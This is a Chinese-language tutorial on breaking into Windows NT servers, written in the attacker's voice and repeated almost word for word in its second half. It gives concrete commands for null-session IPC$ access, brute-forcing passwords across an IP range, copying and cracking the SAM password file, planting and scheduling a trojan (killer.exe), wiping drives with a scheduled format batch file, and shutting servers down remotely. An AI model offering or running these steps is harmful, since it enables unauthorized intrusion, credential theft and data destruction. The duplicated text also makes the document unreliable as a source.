大致說來,入侵Windows NT的原理和入侵Win95/98差不多, 因為NT同樣是使用NetBIOS Over TCP/IP ( NBT )的技術, 而且應用范圍比Win95/98 更廣泛。以下是幾種黑客入侵Windows NT的方法, 讓我們也窺探一下黑客的“武器庫”吧。
方法一、 使用空密碼連線
現在假設目標電腦的IP地址是202.64.161.X (X為任選數字), 先使用nbtstat 指令查看對方NT的網絡數據:
nbtstat -A 202.64.161.X
如果看到<20 的字樣, 那么此NT系統可能將自己電腦數據共享出來。其實在NT安裝后, 會將電腦上的驅動器都共享出來, 沒錯, 是自動共享出來的! 不過只是隱藏了, 所以你未必會看得見。而很多人在安裝好NT后未做任何設置便即使用, 這正好給黑客一個入侵的大好機會。隨后黑客就會使用Net View 指令看看這個IP 地址:
net view //202.64.161.X
正常來說會出現系統發生 System error 5 has occurred 的字樣。這就是NT比Win95/98 安全的地方! 如果是Win95/98 , 只要使用net view 指令就可以看到對方電腦所有共享出來的資源, 如果是NT就一定要登錄進入NT服務器才可以用net view 指令。但黑客并沒有對NT服務器的帳戶, 又怎樣登錄呢? 其實NT有一個很大的漏洞, 它有一個ipc$( Inter-Process Communication: 進程間通訊 ) , 其同樣是隱藏共享, 作為服務器與服務器間的溝通, 只要連接到對方的IPC, 便有機會入侵了。他會先用null password ( 空密碼, 即是沒有密碼! ) 來試試, 手法如下:
net use //202.64.161.X/ipc$ “ ” /use:“ ”
以上的“ ” 是空密碼的意思, 如果連接上會看見“指令執行成功”的字樣。接著便再用
net view //202.64.161.X
然后便可以看到對方所有共享出來的資源了。
接著黑客會用net use 指令, 把對方共享出來的資源映射成自己的網絡驅動器, 之后想怎樣用就隨心所欲了。如果對方沒有把隱藏共享取消, 黑客可以用以下指令:
net use X: //ip地址/c$
那對方的C 盤便會變成自己的X 盤了, 不過這方法未必一定可行, 因為NT服務器安裝了Services Pack 3 或以上版本, 用空密碼連接IPC$ 的權限被限制, 不能夠映射NT上的驅動器 , 這時便要使用下一個方法。
方法二、使用NAT工具
如果用空密碼進入NT服務器沒有收獲, 黑客們也不會絕望。黑客可以嘗試使用其他帳戶的密碼來進入。如何知道NT服務器的帳戶? 那當然是猜啦! 其實NT的密碼不是想像中困難, 而是比想像中更易, 而這些大多是人為的錯誤。
首先需要一個NAT的程序, NAT全名是( NetBIOS Auditing Tool ) , 可以自動連線到NT服務器, 并猜對方帳戶的密碼, 這是Internet上黑客入侵NT的必備“武器”。
Essential NetTools 是一個專門檢查NT漏洞的NAT 套餐, 它的功能非常強勁, 先來看看它的幾個主要功能。
1. NB掃描
NB掃描 可以一次性替你掃描 Internet 上電腦的IP, 如果你上網的速度夠快, 不用一分鐘便可以掃描 整個Class C 的IP , 之后它會列出那一段IP地址內所有電腦的NetBIOS數據, 作用和黑客用nbtstat指令一樣, 不同的地方就是不用逐一測試, 節省不少時間。
2. NATShell
NATShell 是用暴力破解的方法嘗試登錄入NT服務器, 只要把目標的IP 地址輸入NATShell 的視窗, 便可以開始了。可能你以為“強攻”會很難, 但根據經驗, 有4成以上的NT都可以輕易攻入, 什么原因呢? 因為人懶之故。
3.LMHosts
用NB掃描到目標后, 可以選“Add all items to LMhosts ”項, 便會將對方的IP 及電腦名稱自動加在電腦的lmhosts文檔內, 以后你可以用“查找”→“電腦”, 找到對方的電腦, 非常方便。
好了! 決定了要檢查的目標后, 在NATShell填上它的IP 地址, 等待一段時間, 便可以看看結果-- NATShell的報告。
NATShell 會不斷用不同的用戶名 (userlist.txt) 及密碼 (passlist.txt) 來登錄進入NT服務器( 當然你可以自己再編輯這兩個文件) 。如果成功連接, 便會有紅色的warning 字句出現, 并且列出該NT系統 的用戶名 和密碼 。
例如找到NT的Administrator(管理員)的密碼是admin 。便會嘗試在DOS下打:
net use x: //IP 地址/c$ /user:administrator admin
便成功地把此NT系統隱藏的C區映射成自己電腦的某個盤了!
如果在NATShell 的報告是所有的共享都有"c onNECTED with name: *SMBSERVER" 的字樣, 即是說NT連密碼都沒有設定, 如果是密碼, 還要打入:
net use x: //IP 地址/c$ /user:administrator
便可以把NT的C 驅動器映射成自己的某個磁盤了。如果被黑客知道了管理員的帳戶, 基本上黑客以后出入如走平地, 整臺NT都會被黑客操控。
NAT 批量掃描法:
因為Essential NetTools 每次只可以掃描一臺NT的密碼漏洞, 效率實在太低了。為了使入侵更有效率, 黑客可以使用NAT的批量掃描法。
在Essential NetTools 的目錄下有一個nat.exe 的文件, 是可以直接在DOS 狀態下執行, 方法是:
nat -o result.tst -u userlist.txt -p passlist.txt 202.64.161.1-202.64.161.254
那么nat 程序便會根據用戶名稱文文檔( userlist.txt ) 和密碼文檔( passlist.txt ) 來登錄進入202.64.161.1 到202.64.161.254 的主機范圍, 并會將結果存在result.txt 上。
方法三、 檢查NT的密碼
用Essential NetTools 可以用不同的戶名稱及密碼文檔來登錄進入NT服務器, 如果直接得到管理員的帳戶, 就證明這臺NT服務器的安全程度低得可憐!
如果只是得到一般的帳戶的密碼, 雖然權力不大, 但也不代表這部NT是安全。例如黑客可以用一般帳戶的密碼登錄進入NT服務器, 然后用Copy 指令, 將NT的密碼文檔拷到自己的電腦中。
不過NT的密碼文檔(SAM , 文件位置在/Winnt/System32/c onfig ) 的系統啟動時是只讀的, 不可以復制, 不過還有另一個文件, 就是在/winnt/repair/ 的目錄中的sam._ 文檔。
Sam._ 是什么文檔? 通常在安裝NT時都會制作系統恢復盤 , 遇到NT有問題時, 便可以用系統恢復盤 進入NT, 而sam._ 便是sam 密碼文檔的“副本”。只要將sam._ 拷到電腦上, 便可以用其他程序來慢慢破解密碼了。在DOS 狀態下執行復制:
copy //202.64.161.X/admin$/repair/sam._ c:/
便會把sam._ 文檔拷到自己的C 盤內。如果目標電腦忽略了sam._ 的重要性, 沒有設定好文件的權限, 便為黑客提供了大好機會了。
如何解開SAM 密碼文檔:
NT的系統密碼是用單向散列( Hash ) 來處理過, 完全看不出源密碼, 理論上要還原成源密碼機會不大, 這些編碼會放在SAM ( Security AccouNTManager ) 數據庫內, 可以用一個專門破解NT密碼的程序--- L0phtCrack 來破解。
它是Internet 上非常有名的檢查NT密碼工具, 它會用各種可能的密碼, 反復模擬NT的編碼過程, 并將編出來的密碼與SAM 數據庫的密碼比對, 如果相同, 就會得出密碼了, 黑客可以借此入侵NT的系統! 先將sam._ 用extract 指令解開, 在DOS 狀態下打:
extract sam._ sam.txt
執行L0phtCrack , 在"File" "Import" "SAM file" 輸入sam.txt ,在"Tools" "Start Crack" 便會開始解密。
如果NT的密碼是一些數字或人名, 用L0phtCrack 不用十分鐘便可以解開!有人曾用一臺Pentium II 的電腦, 只用一日時間便完全解開管理員和其他帳戶的密碼。
但以上這些指令和工具都有限制的,就是只可以顯示NT服務器的隱藏共享、已登錄進入系統的用戶名稱,數據不夠詳細,以下黑客用的NTInfo掃描就可以進一步檢查NT服務器的漏洞(也適用于Windows 2000)。
1. 用戶數據一覽無遺的NTInfo掃描
為了進一步了解目標電腦的安全性, 黑客需要使用一個超小型的工具NTInfo掃描 , 它只有69 KB , 但比Essential NetTools 更強勁! 只要執行它, NT服務器的隱藏共享 、用戶帳戶名稱、域名都會一覽無遺, 可以讓黑客深入了解該臺NT服務器的漏洞! 只要在DOS 狀態下下執行:
ntis -n IP地址
之后NTInfo掃描便會列出一個詳細的報告( HTML 文檔) , 包括所有共享的資源( 包括了隱藏的) 、共享的名稱、所有NT服務器內的帳戶數據, 例如用戶帳戶名稱、是否可以游客身份登錄、多久沒有更改密碼等。而最強悍的地方是NTInfo掃描 ,它會自動檢查NT服務器內帳戶密碼是否足夠安全, 例如檢查用戶名稱和密碼是否一致、或者有沒有使用密碼等。
2. NTResource Kit 幫助入侵
如果大家的NT服務器安裝了NTResource Kit 4.0 , 你會發覺這個工具非常有用。NTResource Kit 可以算是NT服務器的輔助工具, 可以幫助網絡管理人員管理NT和遙控處理NT的工作。不過內里有幾個程序常會被黑客利用來入侵NT的電腦。
(1) . 共享資源的Net Watch
如果有黑客使用上述介紹的方法來進入NT服務器, 便有機會為所欲為了!
只要使用Resource Kit 的"Net Watch" 便可以連接對方的電腦。在"c onnection" / "Add Computer" 輸入電腦的IP 地址, 隔一會便會出現對方電腦共享出來的資源。"Manage Shares" 會顯示對方的共用目錄, 只要按" 添加共享資源" 便可將對方電腦整個硬盤都共享出來, 并且將權限設為"Everyone", 這便使得日后的攻擊更方便了。
(2) . 監視程序的Process Viewer
NTResource Kit 提供了Process Viewer , 它可以檢視Local 和Remote 電腦直接在執行的程序。Process Viewer 可以監視NT服務器的執行情況, 如內存和各種程序的使用情況。只要在"Computer" 輸入對方電腦的IP 地址, 隔一會便會顯示對方NT正在執行的程序, 它可以殺死本地電腦的程序。
黑客如果要殺死遠程電腦的程序也是有辦法的, 只要使用一個名叫Pskiller 的小程序就可以輕易做到了! 先用Process Viewer 連接NT電腦, 知道這臺電腦正在運行什么程序, 之后便可以用Pskiller 來殺死。用法很簡單, 在DOS 狀態下輸入:
pskill // 電腦名稱或IP地址-u roland -p xyz
-u roland : 是用戶名稱/
-p XYZ:進程中的電腦或ID
(3). 定時控制的netsve
netsvc 是一個小小的程序, 可以用來啟動NT的服務, 如schedule(進度表)等, 通常是黑客用來遙控執行NT服務器的某個程序, 先將netsvc 拷到對方的NT內:
copy ntsvc.exe //IP 地址/admin$/system32
然后再輸入:
netsvc //IP 地址schedule /start
這便可以啟動該電腦的schedule 服務。
然后便把一個木馬或病毒程序( 假設是killer.exe ) 拷到對方電腦:
copy filler.exe //IP 地址/admin$/system32
之后便可以用at 指令來設定schedule 的執行時間:
at //IP 地址12:30 killer.exe
這樣就可以在12:30 時自動執行killer.exe
如果遇到一些“辣手”的黑客, 只要復合一個含有format 指令的簡單批處理文件到NT服務器上, 校準時間, 便可以將對方的NT清洗得一干二凈。
(4). 關閉NT的shutdown :
shutdown : 關了對方的NT服務器:
Shutdown //IP 地址t:20
20秒后將NT自動關閉, 如果對方是大型網站可就慘了!
方法一、 使用空密碼連線
現在假設目標電腦的IP地址是202.64.161.X (X為任選數字), 先使用nbtstat 指令查看對方NT的網絡數據:
nbtstat -A 202.64.161.X
如果看到<20 的字樣, 那么此NT系統可能將自己電腦數據共享出來。其實在NT安裝后, 會將電腦上的驅動器都共享出來, 沒錯, 是自動共享出來的! 不過只是隱藏了, 所以你未必會看得見。而很多人在安裝好NT后未做任何設置便即使用, 這正好給黑客一個入侵的大好機會。隨后黑客就會使用Net View 指令看看這個IP 地址:
net view //202.64.161.X
正常來說會出現系統發生 System error 5 has occurred 的字樣。這就是NT比Win95/98 安全的地方! 如果是Win95/98 , 只要使用net view 指令就可以看到對方電腦所有共享出來的資源, 如果是NT就一定要登錄進入NT服務器才可以用net view 指令。但黑客并沒有對NT服務器的帳戶, 又怎樣登錄呢? 其實NT有一個很大的漏洞, 它有一個ipc$( Inter-Process Communication: 進程間通訊 ) , 其同樣是隱藏共享, 作為服務器與服務器間的溝通, 只要連接到對方的IPC, 便有機會入侵了。他會先用null password ( 空密碼, 即是沒有密碼! ) 來試試, 手法如下:
net use //202.64.161.X/ipc$ “ ” /use:“ ”
以上的“ ” 是空密碼的意思, 如果連接上會看見“指令執行成功”的字樣。接著便再用
net view //202.64.161.X
然后便可以看到對方所有共享出來的資源了。
接著黑客會用net use 指令, 把對方共享出來的資源映射成自己的網絡驅動器, 之后想怎樣用就隨心所欲了。如果對方沒有把隱藏共享取消, 黑客可以用以下指令:
net use X: //ip地址/c$
那對方的C 盤便會變成自己的X 盤了, 不過這方法未必一定可行, 因為NT服務器安裝了Services Pack 3 或以上版本, 用空密碼連接IPC$ 的權限被限制, 不能夠映射NT上的驅動器 , 這時便要使用下一個方法。
方法二、使用NAT工具
如果用空密碼進入NT服務器沒有收獲, 黑客們也不會絕望。黑客可以嘗試使用其他帳戶的密碼來進入。如何知道NT服務器的帳戶? 那當然是猜啦! 其實NT的密碼不是想像中困難, 而是比想像中更易, 而這些大多是人為的錯誤。
首先需要一個NAT的程序, NAT全名是( NetBIOS Auditing Tool ) , 可以自動連線到NT服務器, 并猜對方帳戶的密碼, 這是Internet上黑客入侵NT的必備“武器”。
Essential NetTools 是一個專門檢查NT漏洞的NAT 套餐, 它的功能非常強勁, 先來看看它的幾個主要功能。
1. NB掃描
NB掃描 可以一次性替你掃描 Internet 上電腦的IP, 如果你上網的速度夠快, 不用一分鐘便可以掃描 整個Class C 的IP , 之后它會列出那一段IP地址內所有電腦的NetBIOS數據, 作用和黑客用nbtstat指令一樣, 不同的地方就是不用逐一測試, 節省不少時間。
2. NATShell
NATShell 是用暴力破解的方法嘗試登錄入NT服務器, 只要把目標的IP 地址輸入NATShell 的視窗, 便可以開始了。可能你以為“強攻”會很難, 但根據經驗, 有4成以上的NT都可以輕易攻入, 什么原因呢? 因為人懶之故。
3.LMHosts
用NB掃描到目標后, 可以選“Add all items to LMhosts ”項, 便會將對方的IP 及電腦名稱自動加在電腦的lmhosts文檔內, 以后你可以用“查找”→“電腦”, 找到對方的電腦, 非常方便。
好了! 決定了要檢查的目標后, 在NATShell填上它的IP 地址, 等待一段時間, 便可以看看結果-- NATShell的報告。
NATShell 會不斷用不同的用戶名 (userlist.txt) 及密碼 (passlist.txt) 來登錄進入NT服務器( 當然你可以自己再編輯這兩個文件) 。如果成功連接, 便會有紅色的warning 字句出現, 并且列出該NT系統 的用戶名 和密碼 。
例如找到NT的Administrator(管理員)的密碼是admin 。便會嘗試在DOS下打:
net use x: //IP 地址/c$ /user:administrator admin
便成功地把此NT系統隱藏的C區映射成自己電腦的某個盤了!
如果在NATShell 的報告是所有的共享都有"c onNECTED with name: *SMBSERVER" 的字樣, 即是說NT連密碼都沒有設定, 如果是密碼, 還要打入:
net use x: //IP 地址/c$ /user:administrator
便可以把NT的C 驅動器映射成自己的某個磁盤了。如果被黑客知道了管理員的帳戶, 基本上黑客以后出入如走平地, 整臺NT都會被黑客操控。
NAT 批量掃描法:
因為Essential NetTools 每次只可以掃描一臺NT的密碼漏洞, 效率實在太低了。為了使入侵更有效率, 黑客可以使用NAT的批量掃描法。
在Essential NetTools 的目錄下有一個nat.exe 的文件, 是可以直接在DOS 狀態下執行, 方法是:
nat -o result.tst -u userlist.txt -p passlist.txt 202.64.161.1-202.64.161.254
那么nat 程序便會根據用戶名稱文文檔( userlist.txt ) 和密碼文檔( passlist.txt ) 來登錄進入202.64.161.1 到202.64.161.254 的主機范圍, 并會將結果存在result.txt 上。
方法三、 檢查NT的密碼
用Essential NetTools 可以用不同的戶名稱及密碼文檔來登錄進入NT服務器, 如果直接得到管理員的帳戶, 就證明這臺NT服務器的安全程度低得可憐!
如果只是得到一般的帳戶的密碼, 雖然權力不大, 但也不代表這部NT是安全。例如黑客可以用一般帳戶的密碼登錄進入NT服務器, 然后用Copy 指令, 將NT的密碼文檔拷到自己的電腦中。
不過NT的密碼文檔(SAM , 文件位置在/Winnt/System32/c onfig ) 的系統啟動時是只讀的, 不可以復制, 不過還有另一個文件, 就是在/winnt/repair/ 的目錄中的sam._ 文檔。
Sam._ 是什么文檔? 通常在安裝NT時都會制作系統恢復盤 , 遇到NT有問題時, 便可以用系統恢復盤 進入NT, 而sam._ 便是sam 密碼文檔的“副本”。只要將sam._ 拷到電腦上, 便可以用其他程序來慢慢破解密碼了。在DOS 狀態下執行復制:
copy //202.64.161.X/admin$/repair/sam._ c:/
便會把sam._ 文檔拷到自己的C 盤內。如果目標電腦忽略了sam._ 的重要性, 沒有設定好文件的權限, 便為黑客提供了大好機會了。
如何解開SAM 密碼文檔:
NT的系統密碼是用單向散列( Hash ) 來處理過, 完全看不出源密碼, 理論上要還原成源密碼機會不大, 這些編碼會放在SAM ( Security AccouNTManager ) 數據庫內, 可以用一個專門破解NT密碼的程序--- L0phtCrack 來破解。
它是Internet 上非常有名的檢查NT密碼工具, 它會用各種可能的密碼, 反復模擬NT的編碼過程, 并將編出來的密碼與SAM 數據庫的密碼比對, 如果相同, 就會得出密碼了, 黑客可以借此入侵NT的系統! 先將sam._ 用extract 指令解開, 在DOS 狀態下打:
extract sam._ sam.txt
執行L0phtCrack , 在"File" "Import" "SAM file" 輸入sam.txt ,在"Tools" "Start Crack" 便會開始解密。
如果NT的密碼是一些數字或人名, 用L0phtCrack 不用十分鐘便可以解開!有人曾用一臺Pentium II 的電腦, 只用一日時間便完全解開管理員和其他帳戶的密碼。
但以上這些指令和工具都有限制的,就是只可以顯示NT服務器的隱藏共享、已登錄進入系統的用戶名稱,數據不夠詳細,以下黑客用的NTInfo掃描就可以進一步檢查NT服務器的漏洞(也適用于Windows 2000)。
1. 用戶數據一覽無遺的NTInfo掃描
為了進一步了解目標電腦的安全性, 黑客需要使用一個超小型的工具NTInfo掃描 , 它只有69 KB , 但比Essential NetTools 更強勁! 只要執行它, NT服務器的隱藏共享 、用戶帳戶名稱、域名都會一覽無遺, 可以讓黑客深入了解該臺NT服務器的漏洞! 只要在DOS 狀態下下執行:
ntis -n IP地址
之后NTInfo掃描便會列出一個詳細的報告( HTML 文檔) , 包括所有共享的資源( 包括了隱藏的) 、共享的名稱、所有NT服務器內的帳戶數據, 例如用戶帳戶名稱、是否可以游客身份登錄、多久沒有更改密碼等。而最強悍的地方是NTInfo掃描 ,它會自動檢查NT服務器內帳戶密碼是否足夠安全, 例如檢查用戶名稱和密碼是否一致、或者有沒有使用密碼等。
2. NTResource Kit 幫助入侵
如果大家的NT服務器安裝了NTResource Kit 4.0 , 你會發覺這個工具非常有用。NTResource Kit 可以算是NT服務器的輔助工具, 可以幫助網絡管理人員管理NT和遙控處理NT的工作。不過內里有幾個程序常會被黑客利用來入侵NT的電腦。
(1) . 共享資源的Net Watch
如果有黑客使用上述介紹的方法來進入NT服務器, 便有機會為所欲為了!
只要使用Resource Kit 的"Net Watch" 便可以連接對方的電腦。在"c onnection" / "Add Computer" 輸入電腦的IP 地址, 隔一會便會出現對方電腦共享出來的資源。"Manage Shares" 會顯示對方的共用目錄, 只要按" 添加共享資源" 便可將對方電腦整個硬盤都共享出來, 并且將權限設為"Everyone", 這便使得日后的攻擊更方便了。
(2) . 監視程序的Process Viewer
NTResource Kit 提供了Process Viewer , 它可以檢視Local 和Remote 電腦直接在執行的程序。Process Viewer 可以監視NT服務器的執行情況, 如內存和各種程序的使用情況。只要在"Computer" 輸入對方電腦的IP 地址, 隔一會便會顯示對方NT正在執行的程序, 它可以殺死本地電腦的程序。
黑客如果要殺死遠程電腦的程序也是有辦法的, 只要使用一個名叫Pskiller 的小程序就可以輕易做到了! 先用Process Viewer 連接NT電腦, 知道這臺電腦正在運行什么程序, 之后便可以用Pskiller 來殺死。用法很簡單, 在DOS 狀態下輸入:
pskill // 電腦名稱或IP地址-u roland -p xyz
-u roland : 是用戶名稱/
-p XYZ:進程中的電腦或ID
(3). 定時控制的netsve
netsvc 是一個小小的程序, 可以用來啟動NT的服務, 如schedule(進度表)等, 通常是黑客用來遙控執行NT服務器的某個程序, 先將netsvc 拷到對方的NT內:
copy ntsvc.exe //IP 地址/admin$/system32
然后再輸入:
netsvc //IP 地址schedule /start
這便可以啟動該電腦的schedule 服務。
然后便把一個木馬或病毒程序( 假設是killer.exe ) 拷到對方電腦:
copy filler.exe //IP 地址/admin$/system32
之后便可以用at 指令來設定schedule 的執行時間:
at //IP 地址12:30 killer.exe
這樣就可以在12:30 時自動執行killer.exe
如果遇到一些“辣手”的黑客, 只要復合一個含有format 指令的簡單批處理文件到NT服務器上, 校準時間, 便可以將對方的NT清洗得一干二凈。
(4). 關閉NT的shutdown :
shutdown : 關了對方的NT服務器:
Shutdown //IP 地址t:20
20秒后將NT自動關閉, 如果對方是大型網站可就慘了!